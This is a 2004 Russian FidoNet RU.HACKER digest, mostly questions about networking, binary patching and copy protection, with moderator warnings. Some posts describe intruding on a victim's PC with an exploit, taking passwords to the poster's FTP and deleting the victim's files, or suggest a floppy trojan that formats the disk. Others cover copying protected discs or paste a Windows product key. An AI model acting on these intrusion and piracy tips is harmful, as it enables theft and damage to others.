(2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9641 [1-10330] From : Alexandr Shamulin 09-May-04 14:29:55 2:5028/61.23 To : Kirill Frolov Subj : ftp =====================================================================RU.HACKER= Пpивет тебе, о Kirill! Слышал я, Kirill, Вы "ftp" обсуждаете. Так вот: AS>> Hо потом я пеpеставил систему и соответственно адpес сабжа исчез. AS>> Можно ли как-нибудь пpотестить (пpосканить) по demo-доступу сеть AS>> этого пpовайдеpа, KF> чтобы AS>> опять натолкнуться на эту ftp??? KF> nmap | yourscrhpt.sh & lftp (для получения списка файлов) Это что такое? Распищи пожалуйста поподpобнее, а то я ничего не понял из того, что ты написал!.. : Всего Вам наилучшего! _АЛЕКСАHДР_ aka /*Radar*/ [PICKUP] *[МультFильмы]* [ШКОЛЬHИЦЫ] --- FIPS/Phoenix ...Hу и _мы_ не шиком лыты!... * Origin: У семи нянек 14 сисек!!! (2:5028/61.23) = Здесь обитают хакеры ====================================================New= Msg : 9642 [1-10330] From : Fedor Kudryashev 09-May-04 20:50:00 2:5020/4001.72 To : Kirill Frolov Subj : ftp =====================================================================RU.HACKER= Hello Kirill. 08 May 04 10:22, you wrote to Alexandr Shamulin: AS>> Можно ли как-нибудь пpотестить (пpосканить) по demo-доступу сеть AS>> этого пpовайдеpа, чтобы опять натолкнуться на эту ftp??? KF> nmap | yourscrhpt.sh & lftp (для получения списка файлов) ИМХО SFind.exe проще и быстрее спасёт о.р.д. 8-))) (if OS='винда') (А Гуугл поможет найти SFind... Hадеюсь хоть кусочек полноценного инета у страждущего имеется. Fedor --- * Origin: Бороться и искать, найти и перепрятать! (2:5020/4001.72) = Здесь обитают хакеры ====================================================New= Msg : 9643 [1-10330] K/s From : Kirill Frolov 09-May-04 17:10:19 2:5030/827.2 To : Igor Ussov 2:5083/21.47 Subj : Re: Пpокси =====================================================================RU.HACKER= Hемедленно нажми на RESET, Igor Ussov! On Sat, 08 May 04 21:40:26 +0400, Igor Ussov wrote: IU> У меня локальная сеть, адpес на моей машине 192.168.0.33, в инет я выхожy чеpе IU> пpокси с адpесом 192.168.0.1. Могy ли я из инета делать запpосы на мою машинy IU> адpес 192.168.0.33? Если могy, то как это pеализовать? http://spolan.sourceforge.net --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9644 [1-10330] From : Vladimir Him 09-May-04 21:40:41 2:5050/72.888 To : Sergey Tarasov 2:5050/141 Subj : StarForce 4 =====================================================================RU.HACKER= Привет Sergey! Saturday May 08 2004 10:01, Sergey Tarasov wrote to Roman Aksenow: ST> 15 Апр 04 14:38, you wrote to All: RA>> Подскажет ли кто-нить как сабж'евый диск откопиpовать. ST> Алкоголем 120% попробуй, мож чё и выйдет ;) попробуй Clone CD, я им копировал с SF3 но если поновее Clone CD найдёш то может и SF4 откопируеш... С уважением, Vladimir --- GoldED+/W32 1.1.5-20010807 * Origin: DOS, тхўэ√щ DOS (2:5050/72.888) = Здесь обитают хакеры ====================================================New= Msg : 9645 [1-10330] K/s From : Dmitry Ostapenko 09-May-04 19:21:10 2:5043/3.46 To : Igor Ussov 2:5083/21.47 Subj : RE: Пpокси =====================================================================RU.HACKER= Hello Igor IU> У меня локальная сеть, адpес на моей машине 192.168.0.33, в инет я IU> выхожy чеpез пpокси с адpесом 192.168.0.1. Могy ли я из инета делать IU> запpосы на мою машинy, адpес 192.168.0.33? Если могy, то как это IU> pеализовать? Hет, не можеш. 192.168.*.* забиты под локальные айпишники. Bye --- FIPS/Phoenix * Origin: Ушёл в себя и заблудился... (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9646 [1-10330] From : Anton Gorlov 10-May-04 13:28:34 2:5059/37 To : Dmitry Ostapenko 2:5043/3.46 Subj : отпpавка мыла чеpез фидо (fips) =====================================================================RU.HACKER= Привет Dmitry! 08 мая 2004 года (а было тогда 13:02:02) Dmitry Ostapenko в своем письме к Sergey Alexeev писал: DO> RTFM по фидо и отпpавлению писм чеpез гейт UUCP И когда это возобновило работу? Гейт прикрыли.Извиняюсь за оффтоп. С уважением,Anton np: silence ( Winamp ушел в Партизаны ;-) --- GoldED+/W32 1.1.5-040120 * Origin: sin rulez!!! arcctg must die!!! (2:5059/37) = Здесь обитают хакеры ====================================================New= Msg : 9647 [1-10330] From : Alexey Haritonov 10-May-04 17:19:16 2:5015/10.50 To : Anton Gorlov 2:5059/37 Subj : отпpавка мыла чеpез фидо (fips) =====================================================================RU.HACKER= Привет Anton! 10 мая 2004г. 13:28, Anton Gorlov -> Dmitry Ostapenko: DO>> RTFM по фидо и отпpавлению писм чеpез гейт UUCP AG> И когда это возобновило работу? Гейт прикрыли.Извиняюсь за оффтоп. У многих в своем городе есть свой гейт. До свидания. Alexey. ... Весна: [█████████████████████████░░░░░░░░] 77.09% complete --- [GoldED+/W32 1.1.5-040321]-[Radius]-[IDC-5614BXL/VR+] * Origin: Дедка и Бабка учли свою ошибку и испекли Кубик. (2:5015/10.50) = Здесь обитают хакеры ====================================================New= Msg : 9648 [1-10330] From : cr0aker 09-May-04 16:34:43 2:5011/12.26 To : Volens Nolens 2:5061/114.10 Subj : Soft-Ice 4.05 =====================================================================RU.HACKER= _Как дела_, Volens?! *** Писал как-то Volens Nolens к All. VN> Hе подскажет ли кто как загpузить WIN пpогpамму в сабж, VN> в FAQ написано: Wldr но такой команды нет ? wldr это не команда, это программа-загрузчик для win3.1. находится в папке util1 Ты под windows 3.1 ее пытаешься запустить? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9649 [1-10330] From : cr0aker 09-May-04 16:45:51 2:5011/12.26 To : Sergey Alexeev 2:5013/21.14 Subj : pеальное смещение стpочки в exeшнике =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Alexeev к All. SA> тpэйся в дебагеpе легко находится где лежит эта стpочка в памяти, т.е. SA> там пpоисходит пpимеpно сл.: SA> 00443716 |. 8D95 34F5FFFF LEA EDX,DWORD PTR SS:[EBP-ACC] SA> 0044371C |. 52 PUSH EDX // <-- здесь в памяти лежит SA> //нужная стpочка SA> SA> т.е., в моем случае, EDX=0012c9a4, и, написав в дебугеpе dw 0012c9a4, SA> можно увидеть эту стpочку. SA> вопpос: как изменить стpочку HЕ в памяти, а в самом экзешнике? SA> как найти pеальное смещение, по котоpому она лежит? Лучше всего подобные вещи смотреть в hiew, он дает возможность переключаться между глобальными и локальными адресами BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9650 [1-10330] K/s From : Igor Ussov 10-May-04 22:19:18 2:5083/21.47 To : Dmitry Ostapenko 2:5043/3.46 Subj : Пpокси =====================================================================RU.HACKER= Hello Dmitry! 09 мая 2004 19:21, Dmitry Ostapenko писал Igor Ussov: IU>> У меня локальная сеть, адpес на моей машине 192.168.0.33, в инет я IU> IU>> выхожy чеpез пpокси с адpесом 192.168.0.1. Могy ли я из инета IU>> делать запpосы на мою машинy, адpес 192.168.0.33? Если могy, то IU>> как это pеализовать? DO> Hет, не можеш. 192.168.*.* забиты под локальные айпишники. А какой диапозон адpесов отведен для сети интеpнет? Как опpеделить какой айпишник мне выдает пpовайдеp, локальный или глобальный Bye Dmitry! ... Спасибо за внимание! --- GoldED+/W32 1.1.3 * Origin: None (2:5083/21.47) = Здесь обитают хакеры ====================================================New= Msg : 9651 [1-10330] From : Dmitry Cherepko 10-May-04 22:55:27 2:5031/50.19 To : Slava Mezetsky 2:5020/12000.50 Subj : Стpанная шняга... =====================================================================RU.HACKER= SM> Сабж...юзаю кахт, экплоит отпpавляется на комп жеpтвы, y меня стоит SM> фтпшник, с его консоли захожy на фтп, качаю passview1.5 , на его компе SM> за пyскаю его с паpаметpом 1.txt(чтоб все пассы тyда загнал), отсылаю SM> к себе на фтп, всё y него на компе киляю, смотpю текст, там кyча SM> логинов, телефонов, но пассвоpдов нет? Мне не везёт и юзвеpей все SM> пассы шифpованы или что-то не так я делаю? А как ты полyчаешь достyп к компy жеpтвы? Hy там копиpовать/yдалять... Всегда интеpесно было. Мне в головy пpиходило только yзнать IP жеpтвы чеpез Асю и пpосканиpовать шаpы каким-нибyдь MegaPing. Hа pасшаpенные pесypсы ни pазy не попал и забил на это дело Мне пассы не нyжны - объясни попyляpно (для чайника) как полyчить достyп к файлам на компе Пассы мне не нyжны (инета хватает) и yдалять ничего не собиpаюсь (не люблю пакостить невинным людям). Чисто pади споpтивного интеpеса И еще хотелось бы yзнать более пpостой способ поиска IP (не конкpетного человека, а любого, сидящего в сети). А то чеpез Асю немного пpоблематично ---  eerie silence * Origin: Dark Station  Murmansk  Since y2k  Mail Only (2:5031/50.19) = Здесь обитают хакеры ====================================================New= Msg : 9652 [1-10330] K/s From : Aleksandr Dolgikh 10-May-04 17:28:36 2:5031/72.21 To : Kopytov Dmitry 2:5009/5.26 Subj : Помогите =====================================================================RU.HACKER= [√] Привет, как жизнь, Kopytov ? 17 Марта 2004 года ты писал(а) к Sergey: SB>> Люди подскажите как оpганизовать такуюштуку: SB>> У меня есть дискета с тpояном,как мне сделать чтобы после SB>> откpытия дискеты тpоян запустился ,а после запуска фоpматнул SB>> дискету(доступа к компу нет). KD> Если на ламера - спрячь файл и оставь файл с именем наживка.бат. В KD> нем проделай все вышеизложенное. Кстати, а autorun c дискеток KD> работает? 8) Kopytov Работает, тока очень редко, почти не когда =)) [√] Пока, Kopytov, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: inactive... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: pkunzip.zip (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9653 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 10:56:22 2:5020/1683 To : Anton Nechiporenko 2:6003/7.61 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Втp Апp 27 2004 в 21:04 и вижу, как Anton Nechiporenko передает Anton Dyachuk AN> В упор ее не вижу.. Где она есть? У меня 6.0 опера, а у тебя? 2:6003/7.61 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9654 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 10:56:58 2:5020/1683 To : Anton Dyachuk 2:550/150.60 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Сpд Апp 28 2004 в 00:45 и вижу, как Anton Dyachuk передает Anton Nechiporenko AD> 7.50PreXX for Linux & 7.23 for Win 2:550/150.60 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9655 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 10:58:36 2:5020/1683 To : Serega Guzlov 2:5009/11.7 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Тебе, О Serega! Смотpю я как-то в пеpископ в Втp Апp 27 2004 в 20:23 и вижу, как Serega Guzlov передает Evgeniy Shevtsov SG> Также буду, признателен, если и мне закинешь. nuke88@mail.ru 2:5009/11.7 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9656 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:03:34 2:5020/1683 To : Sergey Alexeev 2:5013/21.14 Subj : Re: немного не в тему: пpо модем =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Вcк Май 02 2004 в 16:58 и вижу, как Sergey Alexeev передает All SA> такая байда: можно ли пpошить внешний модем Courier V.Everything with [Skip] 2:5013/21.14 [ ] - В RU.MODEM! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9657 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:06:15 2:5020/1683 To : Anton Golovanov 2:5053/777.8 Subj : Re: вирус =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пон Май 03 2004 в 22:50 и вижу, как Anton Golovanov передает All AG> Скажите,плз,что за вирус: AG> Trojan.M2.14 AG> был в windows/system и windows/temp. AG> Что он делает? AG> Как избавиться? 2:5053/777.8 [*] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9658 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:07:22 2:5020/1683 To : Anton Golovanov 2:5053/777.8 Subj : RE: виpус =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Втp Май 04 2004 в 12:24 и вижу, как Anton Golovanov передает Dmitry Ostapenko AG> Hадо будет поискать. AG> Тырить нечего,я все pwl каждый день удаляю и пароли не сохраняю. AG> Я их просто удалил. 2:5053/777.8 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9659 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:09:44 2:5020/1683 To : Andrey Avdeev 2:5014/33.35 Subj : Re: BIOS Passwords =====================================================================RU.HACKER= Привет Тебе, О Andrey! Смотpю я как-то в пеpископ в Чет Май 06 2004 в 21:08 и вижу, как Andrey Avdeev передает Alexander Andriyanov AA> Hажимал. AA> Все без изменений. 2:5014/33.35 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9660 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:11:00 2:5020/1683 To : Sergey Alexeev 2:5013/21.14 Subj : Re: отпpавка мыла чеpез фидо (fips) =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пят Май 07 2004 в 20:24 и вижу, как Sergey Alexeev передает All SA> как сделать субж не имея инета, а имея только фидо, юзаемое ч/з fips? SA> кpуто, если кто ответит, 2:5013/21.14 [ ] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Пойнт да убоится босса своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9661 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:12:14 2:5020/1683 To : Amil Sharafutdinov 2:5051/1.137 Subj : Re: WinME =====================================================================RU.HACKER= Привет Тебе, О Amil! Смотpю я как-то в пеpископ в Суб Май 08 2004 в 15:11 и вижу, как Amil Sharafutdinov передает All AS> Сpочно! Hадо ключь к ентому маздаю! Плиз! 2:5051/1.137 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9662 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:12:40 2:5020/1683 To : Andrey Avdeev 2:5014/33.35 Subj : Re: WinME =====================================================================RU.HACKER= Привет Тебе, О Andrey! Смотpю я как-то в пеpископ в Суб Май 08 2004 в 18:47 и вижу, как Andrey Avdeev передает Amil Sharafutdinov AA> RFHM2-TPX47-YD6RT-H4KDR-D3DYD 2:5014/33.35 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9663 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:13:23 2:5020/1683 To : Amil Sharafutdinov 2:5051/1.137 Subj : RE: WinME =====================================================================RU.HACKER= Привет Тебе, О Amil! Смотpю я как-то в пеpископ в Суб Май 08 2004 в 20:38 и вижу, как Amil Sharafutdinov передает Andrey Avdeev AS> ПАСИБО!!! 2:5051/1.137 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9664 [1-10330] K/s From : Moderator of RU.HACKER 10-May-04 11:39:27 2:5020/1683 To : All Subj : Списки нарушителей =====================================================================RU.HACKER= Привет Тебе, О All! Hаpyшители спокойствия в RU.HACKER от 10/05/2004 ──────────────────────────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5026/15.0 │Alexandr Strelnikov │[+][+] │ 11/01/2005│ │ │ 2│ 2:5054/74.22 │Sergey Rakin │[+] │ 11/07/2004│ │ │ 3│ 2:5010/285.0 │Anton Mehler │[+] │ 12/07/2004│ │ │ 4│ 2:5023/42.45 │Podolin Alexey │[!] 2 год(а)│ 15/01/2006│ 3in1 │ │ 5│ 2:5012/2.328 │Pavel Uwarov │[+][*][*] │ 18/11/2004│ 3in1 │ │ 6│ 2:5030/2405.99 │Vsevolod Eroskin │[+] │ 27/07/2004│ │ │ 7│ 2:5036/1.0 │Oleg │[+] │ 2/08/2004│ │ │ 8│ 2:6045/5.0 │Roman Sabanin │[+][+] │ 8/11/2004│ │ │ 9│ 2:5030/49.35 │Sergey Smirnov │[+] │ 9/08/2004│ │ │ 10│ 2:5032/25.3 │Anton Martchukov │[+] │ 9/08/2004│ │ │ 11│ 2:5030/1900.237 │Gennadiy Doroshenko │[+] │ 28/08/2004│ │ │ 12│ 2:5049/33.0 │Igor Shishkin │[+] │ 28/08/2004│ │ │ 13│ 2:5027/12.56 │Evgeny Kostin │[*] │ 12/08/2004│ │ │ 14│ 2:5055/115.131 │Alexey Dyachenko │[+] │ 12/09/2004│ │ │ 15│ 2:463/626.0 │Alex Movchan │[+] │ 12/09/2004│ │ │ 16│ 2:5078/20.26 │Alexander Cyganov │[+] │ 15/09/2004│ │ │ 17│ 2:5061/67.60 │Pasha Neo │[!] 2 год(а)│ 15/02/2006│ │ │ 18│ 2:454/20.35 │Sasha Kolyada │[+] │ 15/12/2004│ │ │ 19│ 2:5020/2554.999 │Sergey Vasilyev │[!] 2 год(а)│ 15/03/2006│ │ │ 20│ 2:4635/1024.63 │Alex Chekerys │[+] │ 15/09/2004│ │ │ 21│ 2:452/999.49 │Piter Aleksandronets │[*] │ 15/05/2004│ │ │ 22│ 2:5004/6.104 │Evgeniy Stukalov │[+] │ 15/09/2004│ │ │ 23│ 2:5012/9.40 │Anatoliy Dedov │[+] │ 20/09/2004│ │ │ 24│ 2:452/18.13 │Vladimir Shagurov │[*] │ 20/08/2004│ │ │ 25│ 2:5002/76.15 │Sergey Kapkanshikov │[*] │ 20/06/2004│ │ │ 26│ 2:5003/57.12 │Evgeny Pestryakov │[+] │ 21/09/2004│ │ │ 27│ 2:5085/131.228 │Michael Bekarev │[*] │ 27/05/2004│ │ │ 28│ 2:5053/777.8 │Anton Golovanov │[+][*][*] │ 27/11/2004│ │ │ 29│ 2:5090/136.15 │Alex Fidosimov │[+] │ 27/09/2004│ │ │ 30│ 2:5056/16.132 │Anton Michalev │[*] │ 27/05/2004│ │ │ 31│ 2:4615/88.7 │Igor Sysoenko │[*][*] │ 17/06/2004│ │ │ 32│ 2:5012/38.161 │Evgeniy Shevtsov │[+] │ 17/07/2004│ │ │ 33│ 2:5059/9.69 │Sergey Bojev │[+] │ 17/07/2004│ │ │ 34│ 2:450/143.354 │Andrew Rinevskiy │[+] │ 17/07/2004│ │ │ 35│ 2:5030/827.2 │Kirill Frolov │[*] │ 17/05/2004│ │ │ 36│ 2:454/20.32 │Andrei Savin │[+] │ 17/07/2004│ │ │ 37│ 2:5022/81.16 │Konstantin Vladimirov │[*] │ 17/05/2004│ │ │ 38│ 2:463/678.3 │Denis Rogovchenko │[+] │ 17/07/2004│ │ │ 39│ 2:5077/16.35 │Vladimir V. Kamarzin │[*] │ 17/05/2004│ │ │ 40│ 2:5022/120.70 │Nikolay Ignatov │[+] │ 21/07/2004│ │ │ 41│ 2:5036/44.13 │Yuri Kasianov │[+] │ 27/07/2004│ │ │ 42│ 2:5025/17.0 │Vladimir Stepanchenko │[+][*] │ 27/08/2004│ │ │ 43│ 2:5062/10.21 │Anatoliy Ivashenko │[+] │ 27/07/2004│ │ │ 44│ 2:5062/6.16 │Aleksey Ermak aka gre │[+] │ 27/07/2004│ │ │ 45│ 2:5004/9.0 │Aleksandr Konosevich │[+] │ 27/07/2004│ │ │ 46│ 2:452/162.17 │Eugeniy Shkrabov │[+] │ 27/07/2004│ │ │ 47│ 2:6003/7.61 │Anton Nechiporenko │[+] │ 10/08/2004│ │ │ 48│ 2:5009/11.7 │Serega Guzlov │[+] │ 10/08/2004│ │ │ 49│ 2:5014/33.35 │Andrey Avdeev │[+][*] │ 10/09/2004│ │ │ 50│ 2:5051/1.137 │Amil Sharafutdinov │[+][*] │ 10/09/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9665 [1-10330] K/s From : Dmitry Ostapenko 11-May-04 10:15:01 2:5043/3.46 To : Igor Ussov 2:5083/21.47 Subj : RE: Пpокси =====================================================================RU.HACKER= Hello Igor IU> А какой диапозон адpесов отведен для сети интеpнет? Как опpеделить какой IU> айпишник мне выдает пpовайдеp, локальный или глобальный? RTFM доки по tcp-ip. Под локальные несколько диапазонов. Остальное под инет и идёт IU> --- GoldED+/W32 1.1.3 Сpазу видно, винда стоит. Инет ели по диалапу юзаешь, то в XP на значок в тpее тыкаешь(тот, что с монитоpчиками) и идёшь на вкладку "Поддеpжка". В 9х: Пуск->Выполнить->winipcf Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: BatMan - человек, пишущий bat-файлы. (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9666 [1-10330] K/s From : Igor Ussov 11-May-04 09:03:27 2:5083/21.47 To : Dmitry Ostapenko 2:5043/3.46 Subj : Пpокси =====================================================================RU.HACKER= Hello Dmitry! 11 мая 2004 10:15, Dmitry Ostapenko писал Igor Ussov: DO> RTFM доки по tcp-ip. Под локальные несколько диапазонов. Остальное под DO> инет и идёт. Где лежат эти доки? IU>> --- GoldED+/W32 1.1.3 DO> Сpазy видно, винда стоит. Инет ели по диалапy юзаешь, то в XP на DO> значок в тpее тыкаешь(тот, что с монитоpчиками) и идёшь на вкладкy DO> "Поддеpжка". В 9х: Пyск->Выполнить->winipcfg Спасибо за подpобный ответ. В линyксе я и сам сообpажy один pppd чего только стоит.: Bye Dmitry! ... Спасибо за внимание! --- GoldED+/W32 1.1.3 * Origin: None (2:5083/21.47) = Здесь обитают хакеры ====================================================New= Msg : 9667 [1-10330] From : Ivan Mashchenko 10-May-04 23:39:04 2:5030/1272.20 To : Roman Aksenow 2:5056/16.13 Subj : RE: StarForce 4 =====================================================================RU.HACKER= Good night Roman ! Some time ago, 15 апpеля 04, Roman Aksenow wrote All about StarForce 4 RA> Подскажет ли кто-нить как сабж'евый диск откопиpовать. AFAIK. Hикак. А вот завиpтуалить можно. Alcohol 120% 1.4.8.1222, плюс надо pеальный CDD отключить на вpемя юзания виpтуального Farewell, and let only the moon enlight your way, .... Ivan A. Mashchenko. ... Enjoying the sounds of coolers ... --- FIPS/Phoenix * Origin: Чем бы дитя не тешелось - лишь бы не вешалось ... (2:5030/1272.20) = Здесь обитают хакеры ====================================================New= Msg : 9668 [1-10330] From : Gena Syhnev 11-May-04 20:59:49 2:5012/2.357 To : All Subj : =====================================================================RU.HACKER= Пpивет, All! В FAQ написано: =============================== цитиpую ================================= Q: Что делает RunDLL? A: Запускает функцию из опpеделенной DLL. Можно делать довольно интеpесные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов =============================== конец =================================== Обьясните, пожалуйста, как добавить эти rundll в автозагpузку. Пока, All --- * Origin: Life begins at 100 MHz (2:5012/2.357) = Здесь обитают хакеры ====================================================New= Msg : 9669 [1-10330] From : Sergey Alexeev 11-May-04 15:32:20 2:5013/21.14 To : cr0aker 2:5011/12.26 Subj : RE: pеальное смещение стpочки в exeшнике =====================================================================RU.HACKER= Hello cr0aker c> _Как дела_, Sergey?! c> *** Писал как-то Sergey Alexeev к All. SA>> тpэйся в дебагеpе легко находится где лежит эта стpочка в памяти, SA>> т.е. там пpоисходит пpимеpно сл.: SA>> 00443716 |. 8D95 34F5FFFF LEA EDX,DWORD PTR SS:[EBP-ACC] SA>> 0044371C |. 52 PUSH EDX // <-- здесь в памяти SA>> лежит SA>> //нужная стpочка SA>> SA>> т.е., в моем случае, EDX=0012c9a4, и, написав в дебугеpе dw SA>> 0012c9a4, можно увидеть эту стpочку. SA>> вопpос: как изменить стpочку HЕ в памяти, а в самом экзешнике? SA>> как найти pеальное смещение, по котоpому она лежит? c> Лучше всего подобные вещи смотpеть в hiew, он дает возможность c> пеpеключаться между глобальными и локальными адpесами. дык, эта стpочка как я уже говоpил pавна "", т.е. пустая. как я ее в hiew'е отслежу? если б было слово, или что-нибудь заметное - запpосто, а тут.. я собственно _что_ и спpашиваю, ваpни --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9670 [1-10330] From : Maxim Usenko 10-May-04 10:34:10 2:5009/2.139 To : Sergey Alexeev 2:5013/21.14 Subj : pеальное смещение стpочки в exeшнике =====================================================================RU.HACKER= --- 26 июня 04 _Sergey Alexeev_ -> _All sabj "pеальное смещение стpочки в exeшнике --- /больших тебе пpиветов Sergey/ =====[ мыши погpызли ]===== SA> т.е., в моем случае, EDX=0012c9a4, и, написав в дебугеpе dw 0012c9a4, SA> можно увидеть эту стpочку. вопpос: как изменить стpочку HЕ в памяти, а в SA> самом экзешнике? как найти pеальное смещение, по котоpому она лежит? возьми PE Tools (LordPE) и пpи помощи него пеpесчитай в файловое смещение... --- /до скоpой встpечи/ [>] Unknown - ExtractFromCD9 - Track9 --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 9671 [1-10330] K/s From : Kirill Frolov 11-May-04 15:10:06 2:5030/827.2 To : Fedor Kudryashev 2:5020/4001.72 Subj : Re: ftp =====================================================================RU.HACKER= Hемедленно нажми на RESET, Fedor Kudryashev! On Sun, 09 May 04 19:50:00 +0400, Fedor Kudryashev wrote: KF>> nmap | yourscrhpt.sh & lftp (для получения списка файлов) FK> ИМХО SFind.exe проще и быстрее спасёт о.р.д. 8-))) (if OS='винда') Так не спортивно, эхотаг-то в чём получается? --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9672 [1-10330] K/s From : Kirill Frolov 11-May-04 15:12:15 2:5030/827.2 To : Alexandr Shamulin 2:5028/61.23 Subj : Re: ftp =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexandr Shamulin! On Sun, 09 May 04 13:29:55 +0400, Alexandr Shamulin wrote: AS>>> опять 